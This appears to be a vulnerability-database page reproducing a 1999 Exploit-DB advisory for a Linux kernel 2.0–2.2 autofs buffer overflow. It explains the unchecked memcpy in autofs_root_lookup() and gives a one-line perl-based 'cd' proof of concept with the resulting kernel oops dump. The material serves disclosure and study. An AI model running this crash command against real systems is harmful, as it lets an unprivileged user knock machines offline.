Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service

🗓️ 19 Feb 1999 00:00:00Reported by Brian JonesType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Denial of service in autofs due to unchecked directory name lengths in Linux kernel versions.

Code
source: https://www.securityfocus.com/bid/312/info

The autofs module provides support for the automount filesystem, as well as the interface between the kernel and the automountd daemon, which is responsible for the actual mounting. Calls such as chdir() executed in the automount directory are handled by the module, and if the desired directory is defined in the configuration files, automountd then mounts that directory/device. When a chdir() or similar function is called in the autofs directory, by a user doing something along the lines of "cd xxxx", the function fs/autofs/root.c:autofs_root_lookup() is called.

The autofs kernel module does not check the size of the directory names it receives. It is passed the name and the names length through dentry->d_name.name and dentry->d_name.len respectively. Later on it memcpy()'s the name into a 256 byte buffer, using dentry->d_name.len as the number of bytes to copy, without checking its size. A nonprivilaged user may attempt to cd to a directory name exceeding 255 characters. This overwrites memory, probably the kernel stack and anything beyond it, and causes kernel errors or makes the machine reboot .

In this example exploit, we have a user using perl to generate a directory name that's 256 characters (the maximum being 255). The buffer for the directory name will overflow by one byte in this case:

[user@localhost auto-mounted-dir]# cd `perl -e 'print "x" x 256'`

invalid operand: 0000

CPU: 0

EIP: 0010:[<c0155b00>]

EFLAGS: 00010282

eax: 00000000 ebx: c2a90c20 ecx: c265904c edx: c0000000

esi: c29d3b00 edi: c2928000 ebp: c260d940 esp: c26c5ee8

ds: 0018 es: 0018 ss: 0018

Process bash (pid: 360, process nr: 21, stackpage=c26c5000)

Stack: 00000000 00000000 c260d940 c260d900 00000286 c0154c58 c0154ca8

c2928000 c260d940 c2928000 c260d900 c2659d50 c26cd3a0 00000286 c0154def

c260d900 c029c000 c2928000 c2659d9c c260d900 c2659d50 c0154ef7 c260d900

c260d900 c029c000 c2928000 c2659d9c c260d900 c2659d50 c0154ef7 c260d900

c260d900

Call Trace: [<c0154c58>] [<c0154ca8>] [<c0154def>] [<c0154ef7>] [<c0128759>]

[<c0128912>] [<c01289e9>] [<c012126e>] [<c0107a40>]

Code: fe ff ff 83 c4 08 eb 03 ff 43 1c 8b 7c 24 1c 83 7f 0c 00 74

-{Shell dies}-

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Feb 1999 00:00Current
7.4High risk
Vulners AI Score7.4
linux kernel 2.0linux kernel 2.1linux kernel 2.2autofsdenial of servicebuffer overflowkernel errornonprivileged userautomount filesystem.
23